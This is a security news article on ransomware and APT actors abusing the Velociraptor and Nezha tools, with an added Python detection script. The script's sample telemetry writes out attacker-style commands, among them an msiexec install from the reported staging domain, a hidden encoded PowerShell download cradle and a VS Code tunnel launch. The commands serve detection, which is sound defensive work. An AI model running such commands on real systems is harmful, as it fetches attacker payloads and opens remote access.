Threat actors are using an increasing variety of commercial and open-source products to carry out their attacks: according to researchers, Velociraptor and Nezha are the latest additions to their attack toolbox.
Velociraptor misuse
A suspected China-based ransomware threat actor has been spotted using Velociraptor, an open-source digital forensics and incident response tool, to maintain covert, persistent access on compromised systems while deploying Warlock, LockBit, and Babuk ransomware on VMware ESXi virtual machines and Windows servers.
“After gaining initial access the actors installed an outdated version of Velociraptor (version 0.73.4.0) that was exposed to a privilege escalation vulnerability (CVE-2025-6264) that could lead to arbitrary command execution and endpoint takeover,” Cisco Talos researchers found.
Judging by the matching indicators of compromise, Sophos incident responders have encountered the same attackers but prevented them from finishing the job (i.e., deploying the ransomware).
“The threat actor used the Windows msiexec utility to download an installer (v2.msi) from a Cloudflare Workers domain (files[.]qaubctgg[.]workers[.]dev). This location appears to be a staging folder for attacker tools, including the Cloudflare tunneling tool and the Radmin remote administration tool,” they shared.
“This file installed Velociraptor, which is configured to communicate with C2 server velo[.]qaubctgg[.]workers[.]dev. The attacker then used an encoded PowerShell command to download Visual Studio Code (code.exe) from the same staging folder and executed it with the tunnel option enabled. The threat actor installed code.exe as a service and redirected the output to a log file. They then used the msiexec Windows utility again to download additional malware (sc.msi) from the workers[.]dev folder.”
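The chain quoted above is a sequence of process executions that defenders can hunt for in endpoint telemetry. The following Python script is an added example, not code from Sophos, Cisco Talos, or the Velociraptor project: it runs simple rules over constructed process-creation records (field names Image and CommandLine, assumed to follow the Sysmon Event ID 1 layout) and flags msiexec installs from a remote URL, encoded PowerShell that contains a download cradle, VS Code launched with its tunnel option, and any reference to the staging domain named in the reporting. The sample events, including the encoded PowerShell command, are constructed for the demonstration.

```python
"""Detection sketch for the msiexec / encoded PowerShell / VS Code tunnel chain.

Constructed example: scans process-creation records (assumed to carry the
Sysmon Event ID 1 fields Image and CommandLine) for the behaviours reported.
"""
import base64
import re
from typing import Dict, List

# Staging domain quoted in the incident reporting.
STAGING_DOMAINS = ("qaubctgg.workers.dev",)

REMOTE_URL = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)
# -e / -ec / -enc / -EncodedCommand followed by a base64 blob
ENCODED_FLAG = re.compile(
    r"(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE
)
DOWNLOAD_KEYWORDS = (
    "invoke-webrequest", "downloadfile", "downloadstring",
    "start-bitstransfer", "curl ", "wget ",
)


def encode_powershell(script: str) -> str:
    """Encode a script the way -EncodedCommand expects (base64 of UTF-16LE)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline: str) -> str:
    """Return the decoded -EncodedCommand payload, or '' if absent or invalid."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return ""


def analyse_event(event: Dict[str, str]) -> List[str]:
    """Apply the four detection rules to one process-creation record."""
    image = event.get("Image", "").lower().rsplit("\\", 1)[-1]
    cmdline = event.get("CommandLine", "")
    lowered = cmdline.lower()
    findings: List[str] = []

    # Rule 1: msiexec installing a package straight from a URL.
    if image == "msiexec.exe":
        url = REMOTE_URL.search(cmdline)
        if url:
            findings.append(f"msiexec remote install from {url.group(0)}")

    # Rule 2: encoded PowerShell whose decoded body is a download cradle.
    if image in ("powershell.exe", "pwsh.exe"):
        decoded = decode_encoded_command(cmdline)
        if decoded and any(k in decoded.lower() for k in DOWNLOAD_KEYWORDS):
            findings.append("encoded PowerShell download cradle")
        lowered += " " + decoded.lower()  # let later rules see the decoded text

    # Rule 3: Visual Studio Code started with the tunnel feature.
    if image == "code.exe" and re.search(r"\btunnel\b", lowered):
        findings.append("VS Code tunnel launched")

    # Rule 4: any reference (raw or decoded) to the known staging domain.
    if any(d in lowered for d in STAGING_DOMAINS):
        findings.append("reference to known staging domain")

    return findings


def scan(events: List[Dict[str, str]]) -> Dict[int, List[str]]:
    """Map each event index to its findings; events with none are omitted."""
    return {i: f for i, ev in enumerate(events) if (f := analyse_event(ev))}


# Constructed sample telemetry mirroring the reported chain, plus one benign install.
_SAMPLE_SCRIPT = (
    "Invoke-WebRequest -Uri https://files.qaubctgg.workers.dev/code.exe "
    "-OutFile C:\\ProgramData\\code.exe"
)
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": "msiexec.exe /i https://files.qaubctgg.workers.dev/v2.msi /qn"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -nop -w hidden -enc " + encode_powershell(_SAMPLE_SCRIPT)},
    {"Image": r"C:\Program Files\Microsoft VS Code\code.exe",
     "CommandLine": r'"C:\Program Files\Microsoft VS Code\code.exe" tunnel --accept-server-license-terms'},
    {"Image": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": r"msiexec.exe /i C:\Users\admin\Downloads\7zip.msi /qn"},  # benign local install
]

if __name__ == "__main__":
    for idx, found in scan(SAMPLE_EVENTS).items():
        print(idx, SAMPLE_EVENTS[idx]["CommandLine"][:60], "->", found)
```

Rule 2 decodes the command before matching, which is why the encoded download of code.exe also trips the staging-domain rule: the domain appears only in the decoded text. In production the same rules would be fed from an EDR or SIEM query rather than an inline list, and the benign fourth event shows the msiexec rule stays quiet for local package paths.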
Nezha misuse
Nezha is an open-source server monitoring and task management tool that a suspected China-nexus APT group has been using to retrieve detailed information about compromised systems and control them.
Essentially, the group has been using it instead of other, more widely used remote monitoring and management tools.
“Beginning in August 2025, Huntress discovered an intrusion where a threat actor used a creative technique called log poisoning (also referred to as log injection) to plant a basic evaluation web shell (also commonly referred to as the China Chopper web shell) on a web server,” Huntress researchers noted.
“This allowed the threat actor to control the web server using AntSword [virtual terminal], before ultimately deploying Nezha, an operation and monitoring tool that allows commands to be run on a web server. Interestingly, this was subsequently used to deploy Ghost RAT on the system. To our knowledge, this is the first public reporting of Nezha being used to facilitate web compromises.”
Huntress researchers pinpointed the Nezha server instance used by the attackers, which showed an open Nezha interface.
“While the Nezha Monitoring server itself requires administrative credentials to retrieve detailed information about systems and control them via their installed Nezha Agent, it doesn’t require authentication to see system health information for systems it’s installed on,” they explained.
They took advantage of this to take a peek and saw that a Nezha client had been installed on more than 100 victim machines. (Also, that this threat actor was running their Nezha dashboard in Russian.)
The threat actor’s Nezha interface (Source: Huntress)
The attackers used the Nezha client (agent) to run an interactive PowerShell to kneecap Windows Defender and install a Ghost RAT variant.
“This activity highlights how attackers are increasingly abusing new and emerging publicly available tooling as it becomes available to achieve their goals,” the researchers added.
For threat actors, the appeal of such tools is clear: they are less likely to be detected by security products, and if detected, they provide plausible deniability compared to bespoke malware.